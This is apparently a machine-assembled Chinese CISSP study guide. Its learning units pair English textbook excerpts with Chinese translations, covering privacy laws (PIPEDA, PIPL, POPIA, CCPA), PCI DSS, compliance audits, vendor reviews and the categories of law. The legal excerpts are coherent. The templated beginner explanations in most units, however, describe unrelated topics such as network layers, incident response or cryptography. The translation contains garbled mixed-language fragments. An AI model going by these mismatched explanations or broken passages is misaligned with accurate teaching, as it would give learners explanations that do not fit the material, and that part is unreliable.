完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

问责性:问责性要求能把行为绑定到具体主体。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

问责依赖识别、认证、授权、审计和记账共同工作。

Minimum level、mandatory requirement 常对应 standard。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
问责性 问责性要求能把行为绑定到具体主体。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 35 / PDF P307

第 307 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Age Marital status Medical, education, or employment history Financial information DNA Identifying numbers Employee performance records The law excludes information that does not fit the definition of personal information, including the following examples provided by the Office of the Privacy Commissioner of Canada: Information that is not about an individual, because the connection with a person is too weak or far-removed Information about an organization such as a business Information that has been rendered anonymous, as long as it is not possible to link that data back to an identifiable person Certain information about public servants such as their name, position, and title A person's business contact information that an organization collects, uses, or discloses for the sole purpose of communicating with that person in relation to their employment, business, or profession Government information An individual's collection, use, or disclosure of personal information strictly for personal purposes (e.g., personal greeting card list) PIPEDA may also be superseded by province-specific laws that are deemed substantially similar to PIPEDA.

These laws currently exist in Alberta, British Columbia, and Quebec. PIPEDA generally does not apply to nonprofit organizations or political parties and associations. Provincial laws apply to municipalities, universities, schools, and hospitals. Chinese Privacy Law Age

中文直译 / 整理

婚姻状况 医疗、教育或就业记录 财务信息 DNA 识别号码 员工绩效记录 法律排除不符合个人定义的信息,包括加拿大隐私专员办公室提供的以下示 例: 与个人无关的信息,因为与 一个人过于软弱或相距太远 有关组织(如企业)的信息 已被匿名化处理的信息,只要无法将该数据与可识别的个人关联起来 有关公职人员的某些信息,例如他们的姓名、职位 和头衔 个人的业务联系信息,组织收集、使用或披露该信息仅用于与该人就其 就业、业务或职业进行沟通。 政府信息 个人为纯粹个人目的收集、使用或披露个人信息(例如,个人贺卡列表) PIPEDA 也可能被认定与 PIPEDA 实质上相似的省一级法律所取代。 目前,阿 尔伯塔省、不列颠哥伦比亚省和魁北克省已存在此类法律。 PIPEDA 通常不适 用于非营利组织或政党和团体。 省级法律适用于市政当局、大学、学校和医院。 中国隐私法

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 307 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 36 / PDF P308

第 308 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

In recent years, China has significantly advanced its legal framework related to data protection and privacy, culminating in the Personal Information Protection Law (PIPL), which came into effect in 2021. The PIPL is China's first comprehensive national standard in data privacy law, somewhat analogous to the GDPR in the EU, and it imposes stringent regulations on personal data processing activities. Key aspects of the PIPL include: Consent and Legitimate Purpose The PIPL mandates that data processing should be specific, clear, and legitimate. Explicit consent is required for data processing, especially for sensitive data, and individuals have the right to withdraw their consent.

Minimum Necessary Data Collection Similar to the GDPR's data minimization principle, the PIPL requires that organizations only collect personal data that is directly relevant and necessary for the stated purpose. Data Subject Rights The law empowers individuals with several rights concerning their personal data, including the right to access, correction, deletion, and to be informed of data breaches. It also allows individuals to object to data processing. Cross-Border Data Transfer The PIPL imposes restrictions on transferring personal data outside of China.

Data exporters must conduct a security assessment and ensure that the receiving country's data protection measures are effectively equivalent to those in China, among other obligations. Heavy Penalties Noncompliance with the PIPL can result in severe consequences, including financial penalties, suspension of business activities, or revocation of business licenses. South African Privacy Law South Africa's primary legislation governing data protection is the Protection of Personal Information Act (POPIA), which went into effect in 2020.

POPIA promotes the protection of personal information processed by public and private bodies and introduces specific conditions for the lawful processing of personal information, closely mirroring principles seen in the GDPR. Important provisions under POPIA include:

中文直译 / 整理

近年来,中国在数据保护和隐私相关的法律框架方面取得了重大进展,最终出 台了 个人信息保护法(PIPL),该法于 2021 年生效。 PIPL 是中国第一部全 面的国家数据隐私法律,与欧盟的 GDPR 相当,对个人数据处理活动施加了 严格的规定。 PIPL的关键方面包括: 同意与合法目的 《个人信息保护法》规定数据 processin g should be s pecific , clear , 和le gitimate。 Ex plicit同意是 数据处理所必需的,特别是对于敏感数据,个人有权撤回其同意。 最小必要数据收集与GDPR的数据最小化原则类似,PIPL要求组织仅收集 与声明目的直接相关且必要的个人信息 目的。 数据主体权利 法律赋予个人多项关于其个人数据的权利,包括访问、更 正、删除的权利,以及获知数据泄露的权利。 它还允许个人反对数据处 理。 跨境数据传输 《个人信息保护法》(PIPL)规 p限制 将个人数据传输至中国境外。 数据出口方必须进行安全评估,并确保接收 国的数据保护措施与中国的措施有效等同,以及其他义务。

严厉处罚 违反《个人信息保护法》(PIPL)可能导致严重后果,包括经 济处罚、暂停业务活动或吊销营业执照。 南非隐私法 南非规范数据保护的主要立法是个人信息保护法(POPIA),该法于2020年生 效。 POPIA促进公共和私人机构处理的个人信息的保护,并引入了个人数据合 法处理的具体条件,与GDPR中的原则高度相似。 POPIA的重要规定包括:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 308 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 37 / PDF P309

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Lawful Processing POPIA sets out eight conditions for the lawful processing of personal information, which includes accountability, processing limitation, purpose specification, further processing limitation, information quality, openness, security safeguards, and data subject participation. Consent Personal information must be collected directly from the data subject, with specific consent required for processing. Consent can be withdrawn, and data subjects also have the right to object to the processing of personal information.

Special Personal Information The act puts strict conditions on the processing of special personal information, such as religious or philosophical beliefs, race or ethnic origin, trade union membership, political persuasion, health or sex life, criminal behavior, or biometric information. Processing of Personal Information of Children POPIA recognizes the vulnerability of children in the digital age and thus places heightened restrictions on the processing of their personal information. Consent is required from a competent person (e.g., a parent or guardian) where the data subject is a child.

Additionally, organizations must ensure that they apply appropriate safeguards when processing children's data, making sure that it is treated with utmost care and not used for exploitative purposes. Cross-Border Information Transfers POPIA restricts the transfer of personal information outside South Africa unless the recipient country has similar privacy protections or the data subject consents to the transfer. Enforcement and Penalties The Information Regulator is the enforcement authority under POPIA, with the power to investigate and fine responsible parties for noncompliance. Penalties for violating POPIA can be severe, including both monetary fines and imprisonment.

State Privacy Laws In addition to the federal and international laws affecting the privacy and security of information, organizations must be aware of the laws passed by states, provinces, and other jurisdictions where they do business. As with the data breach notification laws discussed earlier in this chapter, states often

中文直译 / 整理

合法处理 POPIA规定了个人数据合法处理的八个条件,包括问责制、处理 限制、目的特定化、进一步处理限制、信息质量、公开性、安全保护以及 数据主体参与。 同意 个人信息必须直接从数据主体处收集,处理前需获得明确同意。 同意可 以撤回,数据主体还拥有反对处理个人信息的权利。 特殊个人信息 该法案对特殊个人信息的处理设定了严格条件,例如宗教或 哲学信仰、种族或民族出身、工会会员身份、政治倾向、健康状况或性生 活、犯罪行为或生物识别信息。 儿童个人信息的处理 POPIA 认识到儿童在数字时代中的脆弱性,因此对其 个人信息的处理施加了更严格的限制。 当数据主体为儿童时,必须获得合格 人员(如父母或监护人)的同意。 此外,组织在处理儿童数据时必须确保采 取适当的保障措施,确保以最高级别的谨慎对待,不得用于剥削目的。 跨境信息传输 POPIA 限制将个人信息传输至南非境外,除非接收国具有类 似的隐私保护措施,或数据主体同意该传输。 执法与处罚信息监管机构是POPIA下的执法机构,有权调查并处罚不合规的 责任方。 违反POPIA的处罚可能非常严厉,包括巨额罚款和监禁。

州隐私法律 除了影响信息隐私和安全的联邦和国际法律外,组织还必须关注其开展业务的 各州、省份及其他管辖区所通过的法律。 与本章前面讨论的数据泄露通知法类 似,各州通常

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

问责性:问责性要求能把行为绑定到具体主体。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

问责依赖识别、认证、授权、审计和记账共同工作。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
问责性 问责性要求能把行为绑定到具体主体。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 38 / PDF P310

第 310 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

lead the way in creating privacy regulations that spread across the country and may eventually serve as the model for federal law. The California Consumer Privacy Act (CCPA) is an excellent example of this principle in action. California passed this sweeping privacy law in 2018, modeling it after the European Union's GDPR.

Provisions of the law went into effect in 2020, providing consumers with the following: The right to know what information businesses are collecting about them and how the organization uses and shares that information The right to be forgotten, allowing consumers to request that the organization delete their personal information, in some circumstances The right to opt out of the sale of their personal information The right to exercise their privacy rights without fear of discrimination or retaliation for their use California passed other privacy laws that extended CCPA, and other states have passed similar laws in recent years.

Compliance Over the past decade, the regulatory environment governing information security has grown increasingly complex. Organizations may find themselves subject to a wide variety of laws (many of which were outlined earlier in this chapter) and regulations imposed by regulatory agencies or contractual obligations.

中文直译 / 整理

在制定隐私法规方面走在前列,这些法规可能在全国范围内推广,并最终成为 联邦法律的典范。 《加利福尼亚消费者隐私法(CCPA)》是这一原则付诸实践的绝佳例子。 加 利福尼亚州于2018年通过了这项全面的隐私法律,其模式借鉴了欧盟的 GDPR。 该法律的条款于2020年生效,为消费者提供了以下权利: 了解企业正在收集有关他们的哪些信息,以及组织如何使用和共享这些信息的 权利 被遗忘权,在某些情况下,消费者可以要求组织删除其个人信息 拒绝出售其个人信息的权利 在行使隐私权利时,免于因使用这些权利而遭受歧视或报复的权利 加利福尼亚州还通过了其他扩展CCPA的隐私法律,近年来其他州也通 过了类似的法律。 合规 在过去十年中,监管信息安全的环境变得越来越复杂。 组织可能会发现自己受 到各种法律(本章前面已概述了许多此类法律)以及监管机构或合同义务所规 定的法规的约束。

小白解释

场景先行:你是公司的安全负责人,正在读第 310 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 310 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 39 / PDF P311

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Payment Card Industry Data Security Standard The Payment Card Industry Data Security Standard (PCI DSS) is an excellent example of a compliance requirement that is not dictated by law but by contractual obligation. PCI DSS governs the security of credit card and debit card information and is enforced through the terms of a merchant agreement between a business that accepts credit cards and/or debit cards and the bank that processes the business's transactions. PCI DSS 4.0 has 12 main requirements: Install and maintain network security controls. Apply secure configurations to all system components. Protect stored account data.

Protect cardholder data with strong cryptography during transmission over open, public networks. Protect all systems and networks from malicious software. Develop and maintain secure systems and software. Restrict access to system components and cardholder data by business need to know. Identify users and authenticate access to system components. Restrict physical access to cardholder data. Log and monitor all access to systems and networks regularly. Test security of systems and networks regularly. Support information security with organizational policies and programs.

Each of these requirements is spelled out in detail in the full PCI DSS standard, which can be found at http://pcisecuritystandards.org. Organizations subject to PCI DSS may be required to conduct annual

中文直译 / 整理

支付卡行业数据安全标准 支付卡行业数据安全标准(PCI DSS)是一个很好的例子,说明了并非由 法律而是由合同义务所规定的合规要求。 PCI DSS 规范了信用卡和借记卡 信息的安全性,并通过接受信用卡和/或借记卡的商户与处理该商户交易的 银行之间的商户协议条款进行强制执行。 PCI DSS 4.0 包含 12 项主要要求: 安装并维护网络安全控制措施。 为所有系统组件应用安全配置。 保护存储的账户数据。 在通过开放的公共网络传输时,使用强加密技术保护持卡人 数据。 保护所有系统和网络免受恶意软件侵害。 开发并维护安全的 系统和软件。 根据业务需要限制对系统组件和持卡人数据的访问。 识别用户并验证对系统组件的访问权限。 限制对持卡人数据的物理访问。 定期记录和监控对系统和网络的所有访问。 定期测试系统和网络的安全性。 通过组织政策和计划支持信息安全。 这些要求的详细内容均在完整的PCI DSS标准中列出,该标准可在 http://pcisecuritystandards.org获取。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

信用卡/持卡人数据场景优先想到 PCI DSS。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 40 / PDF P312

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

compliance assessments, depending on the number of transactions they process and their history of cybersecurity breaches. Dealing with the many overlapping, and sometimes contradictory, compliance requirements facing an organization requires careful planning. Many organizations employ full-time IT compliance staff responsible for tracking the regulatory environment, monitoring controls to ensure ongoing compliance, facilitating compliance audits, and meeting the organization's compliance reporting obligations. Organizations that are not merchants but that store, process, or transmit credit card information on behalf of merchants must also comply with PCI DSS.

For example, the requirements apply to shared hosting providers who must protect the cardholder data environment. Organizations may be subject to compliance audits, either by their standard internal and external auditors or by regulators or their agents. For example, an organization's financial auditors may conduct an IT controls audit designed to ensure that the information security controls for an organization's financial systems are sufficient to ensure compliance with the Sarbanes–Oxley Act (SOX). Some regulations, such as PCI DSS, may require the organization to retain approved independent auditors to verify controls and provide a report directly to regulators.

In addition to formal audits, organizations often must report regulatory compliance to a number of internal and external stakeholders. For example, an organization's board of directors (or, more commonly, that board's audit committee) may require periodic reporting on compliance obligations and status. Similarly, PCI DSS requires organizations that are not compelled to conduct a formal third-party audit to complete and submit a self-assessment report outlining their compliance status.

Contracting and Procurement The increased use of cloud services and other external vendors to store, process, and transmit sensitive information leads organizations to a new focus on implementing security reviews and controls in their contracting and

中文直译 / 整理

合规性评估,具体要求取决于其处理的交易数量以及网络安全违规历史。 应对组织面临的众多重叠且有时相互矛盾的合规要求,需要周密的规划。 许多 组织雇佣专职的IT合规人员,负责跟踪监管环境、监控控制措施以确保持续合 规、协助合规审计,并履行组织的合规报告义务。 非商户但代表商户存储、处理或传输信用卡信息的组织也必须遵守 PCI DSS。 例如,这些要求适用于必须保护持卡人数据环境的共享托管服务 提供商。 组织可能面临合规审计,由其内部和外部审计师或监管机构及其代理人进行。 例如,组织的财务审计师可能会开展一项IT控制审计,旨在确保信息安全管 理控制措施对于 组织的财务系统足以满足《萨班斯‑奥克斯利法案》(SOX)的合规要求。 一 些法规,例如PCI DSS,可能要求组织聘请经批准的独立审计师来验证控制措 施并向监管机构直接提交报告。 除正式审计外,组织通常还必须向众多内部和外部利益相关方报告监管合规情 况。 例如,组织的董事会(或更常见的是董事会的审计委员会)可能要求定期 报告合规义务和状态。 同样,PCI DSS要求那些无需进行正式第三方审计的组 织完成并提交一份自我评估报告,说明其合规状况。

合同与采购 云服务及其他外部供应商被越来越多地用于存储、处理和传输敏感信息,这促 使组织更加关注在合同和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 41 / PDF P313

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

procurement processes. Security professionals should conduct reviews of the security controls put in place by vendors, both during the initial vendor selection and evaluation process and as part of ongoing vendor governance reviews. These are some questions to cover during these vendor governance reviews: What types of sensitive information are stored, processed, or transmitted by the vendor? What controls are in place to protect the organization's information? How is your organization's information segregated from that of other clients? If encryption is relied on as a security control, what encryption algorithms and key lengths are used? How is key management handled?

What types of security audits does the vendor perform, and what access does the client have to those audits? Does the vendor rely on any other third parties to store, process, or transmit data? How do the provisions of the contract related to security extend to those third parties? Where will data storage, processing, and transmission take place? If outside the home country of the client and/or vendor, what implications does that have? What is the vendor's incident response process, and when will clients be notified of a potential security breach? What provisions are in place to ensure the ongoing integrity and availability of client data?

This is just a brief listing of some of the concerns you may have. Tailor the scope of your security review to the specific concerns of your organization, the type of service provided by the vendor, and the information that will be shared with them. Summary Computer security necessarily entails a high degree of involvement from the legal community. In this chapter, you learned about the laws that govern

中文直译 / 整理

采购流程中实施安全审查与控制。 安全专业人员应在供应商初始选择和评估过 程中,以及作为持续供应商治理审查的一部分,对供应商实施的安全控制进行 审查。 在这些供应商治理审查中,需要涵盖以下问题: 供应商存储、处理或传输哪些类型的敏感信息? 有哪些控制措施用于保护组织的信息? 贵组织的信息如何与其他客户的信息隔离? 如果依赖加密作为安全控制措施,使用了哪些加密算法和密钥长度? 密钥管 理如何处理? 供应商执行哪些类型的安全审计? 客户对这些审计有何种访问权限? 供应商是否依赖其他第三方来存储、处理或传输数据? 合同中与安全相 关的条款如何适用于这些第三方? 数据存储、处理和传输将在何处进行? 如果在客户和/或供应商所在国之 外进行,会带来哪些影响? 供应商的事件响应流程是什么? 客户将在何时收到潜在安全漏洞的通知? 有哪些条款用于确保客户数据的持续完整性和可用性? 这只是您可能关注的一些问题的简要列表。 请根据贵组织的具体关切、供应 商提供的服务类型以及将与之共享的信息,调整安全审查的范围。 摘要 计算机安全必然需要法律界的高度参与。 在本章中,您学习了规范

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
审计 审计检查控制是否存在、是否有效、是否符合要求。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 42 / PDF P314

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

security issues such as computer crime, intellectual property, data privacy, and software licensing. Three major categories of law impact information security professionals. Criminal law outlines the rules and sanctions for major violations of the public trust. Civil law provides us with a framework for conducting business. Government agencies use administrative law to promulgate the day-to-day regulations that interpret existing law. The laws governing information security activities are diverse and cover all three categories.

Some, such as the Electronic Communications Privacy Act and the Digital Millennium Copyright Act, are criminal laws where violations may result in criminal fines and/or prison time. Others, such as trademark and patent laws, are civil laws that govern business transactions. Finally, many government agencies promulgate administrative law, such as the HIPAA Security Rule, that affects specific industries and data types. Information security professionals should be aware of the compliance requirements specific to their industry and business activities.

Tracking these requirements is a complex task and should be assigned to one or more compliance specialists who monitor changes in the law, changes in the business environment, and the intersection of those two realms. It's also not sufficient to simply worry about your own security and compliance. With increased adoption of cloud computing, many organizations now share sensitive and personal data with vendors that act as service providers. Security professionals must take steps to ensure that vendors treat data with as much care as the organization itself would and also meet any applicable compliance requirements.

Study Essentials Understand the differences between criminal law, civil law, and administrative law. Criminal law protects society against acts that violate the basic principles we believe in. Violations of criminal law are prosecuted by federal and state governments. Civil law provides the framework for disputes between people or the transaction of business between people and organizations. Violations of civil law are brought to the court and argued by the two affected parties. Administrative law is used by government agencies to effectively carry out their day-to-day business.

中文直译 / 整理

安全问题的法律,例如计算机犯罪、知识产权、数据隐私和软件许可。 法律的三大主要类别影响着信息安全专业人员。 刑法规定了对严重违反公众信 任行为的规则和制裁。 民法为我们提供了开展商业活动的框架。 政府机构利用 行政法颁布日常法规,以解释现有法律。 规范信息安全活动的法律种类繁多,涵盖上述三大类别。 一些法律,如《电子 通信隐私法》和《数字千年版权法》,属于刑法范畴,违反这些法律可能导致 刑事罚款和/或监禁。 另一些法律,如商标法和专利法,则属于民法,用于规范 商业交易。 最后,许多政府机构颁布了行政法,例如《健康保险流通与责任法 案》(HIPAA)安全规则,这些法规影响特定行业和数据类型。 信息安全专业人员应了解与其行业和商业活动相关的合规要求。 跟踪这些要求 是一项复杂的任务,应指派一名或多名合规专家负责监控法律变化、商业环境 变化以及这两者之间的交叉影响。 仅仅关注自身的安全与合规是不够的。 随着云计算的广泛采用,许多组织现在 会与作为服务提供商的供应商共享敏感和个人数据。 信息安全专业人员必须采 取措施,确保供应商对待数据的谨慎程度不低于组织自身,并满足所有适用的 合规要求。

